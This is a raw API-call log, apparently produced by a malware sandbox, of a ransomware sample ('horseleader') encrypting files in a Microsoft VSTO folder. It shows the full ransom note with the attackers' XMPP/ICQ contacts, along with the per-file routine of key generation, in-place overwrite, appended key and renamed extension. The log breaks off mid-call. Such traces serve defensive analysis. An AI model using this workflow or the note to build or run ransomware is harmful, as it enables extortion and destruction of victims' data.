ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 0 [0250.652] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0250.653] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\#Decrypt#.txt") returned 79 [0250.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.656] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.656] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0250.657] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.659] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0250.659] CloseHandle (hObject=0x1a4) returned 1 [0250.659] 
GetProcessHeap () returned 0x780000 [0250.659] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.659] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc251dc00, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x5e4b68d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc251dc00, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOInstaller.config", cAlternateFileName="VSTOIN~1.CON")) returned 1 [0250.660] lstrcmpiW (lpString1="VSTOInstaller.config", lpString2="Windows") returned -1 [0250.660] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 81 [0250.660] StrStrIW (lpFirst="VSTOInstaller.config", lpSrch=".horseleader") returned 0x0 [0250.660] lstrcmpW (lpString1="VSTOInstaller.config", lpString2="#Decrypt#.txt") returned 1 [0250.660] lstrcmpW (lpString1="VSTOInstaller.config", lpString2="_uninstalling_.png") returned 1 [0250.660] lstrlenW (lpString=".testttjffg") returned 11 [0250.660] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config", lpSrch=".testttjffg") returned 0x0 [0250.660] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft 
shared\\vsto\\10.0\\vstoinstaller.config"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 81 [0250.662] StrStrW (lpFirst="VSTOInstaller.config", lpSrch=".txt") returned 0x0 [0250.662] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=716) returned 1 [0250.662] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2cc, lpOverlapped=0x0) returned 1 [0250.665] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2cc, lpOverlapped=0x0) returned 1 [0250.665] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.666] CloseHandle (hObject=0x1a4) returned 1 [0250.666] GetProcessHeap () returned 0x780000 [0250.666] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.666] wnsprintfW (in: 
pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.horseleader") returned 93 [0250.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.horseleader")) returned 1 [0250.667] GetProcessHeap () returned 0x780000 [0250.667] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.667] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6d27ac0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x18558, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0250.667] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="Windows") returned -1 [0250.667] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 78 [0250.668] StrStrIW (lpFirst="VSTOInstaller.exe", lpSrch=".horseleader") returned 0x0 [0250.668] lstrcmpW (lpString1="VSTOInstaller.exe", lpString2="#Decrypt#.txt") returned 1 [0250.668] lstrcmpW (lpString1="VSTOInstaller.exe", lpString2="_uninstalling_.png") returned 1 [0250.668] lstrlenW (lpString=".testttjffg") returned 11 [0250.668] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe", lpSrch=".testttjffg") returned 0x0 [0250.668] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.668] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.668] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.672] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 78 [0250.672] StrStrW (lpFirst="VSTOInstaller.exe", lpSrch=".txt") returned 0x0 [0250.672] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=99672) returned 1 [0250.672] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.672] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.675] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.675] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.675] SetFilePointerEx (in: hFile=0x1a4, 
liDistanceToMove=0x9aac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.675] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.678] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.679] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.679] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x13558, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.679] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.679] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.680] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.680] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.680] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.680] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.680] CloseHandle (hObject=0x1a4) returned 1 [0250.681] GetProcessHeap () returned 0x780000 [0250.681] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.681] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe.horseleader") returned 90 [0250.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.horseleader")) returned 1 [0250.682] GetProcessHeap () returned 0x780000 [0250.682] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.682] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x5e950, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOLoader.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0250.682] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="Windows") returned -1 [0250.682] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll") returned 
75 [0250.682] StrStrIW (lpFirst="VSTOLoader.dll", lpSrch=".horseleader") returned 0x0 [0250.683] lstrcmpW (lpString1="VSTOLoader.dll", lpString2="#Decrypt#.txt") returned 1 [0250.683] lstrcmpW (lpString1="VSTOLoader.dll", lpString2="_uninstalling_.png") returned 1 [0250.683] lstrlenW (lpString=".testttjffg") returned 11 [0250.683] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll", lpSrch=".testttjffg") returned 0x0 [0250.683] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.683] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.685] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll") returned 75 [0250.685] StrStrW (lpFirst="VSTOLoader.dll", lpSrch=".txt") returned 0x0 [0250.685] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=387408) returned 1 [0250.685] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.685] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.688] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0250.688] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.689] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x2cca8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.689] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.694] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.694] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.695] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x59950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.695] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.697] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.697] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.697] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0250.698] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.698] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.698] CloseHandle (hObject=0x1a4) returned 1 [0250.698] GetProcessHeap () returned 0x780000 [0250.698] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.699] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll.horseleader") returned 87 [0250.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.horseleader")) returned 1 [0250.700] GetProcessHeap () returned 0x780000 [0250.700] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.700] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd51096e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0xbb68, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOMessageProvider.dll", 
cAlternateFileName="VSTOME~1.DLL")) returned 1 [0250.700] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="Windows") returned -1 [0250.700] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 84 [0250.700] StrStrIW (lpFirst="VSTOMessageProvider.dll", lpSrch=".horseleader") returned 0x0 [0250.700] lstrcmpW (lpString1="VSTOMessageProvider.dll", lpString2="#Decrypt#.txt") returned 1 [0250.700] lstrcmpW (lpString1="VSTOMessageProvider.dll", lpString2="_uninstalling_.png") returned 1 [0250.700] lstrlenW (lpString=".testttjffg") returned 11 [0250.700] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll", lpSrch=".testttjffg") returned 0x0 [0250.700] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.701] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.702] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 84 [0250.702] StrStrW (lpFirst="VSTOMessageProvider.dll", lpSrch=".txt") returned 0x0 [0250.702] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47976) returned 1 [0250.702] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, 
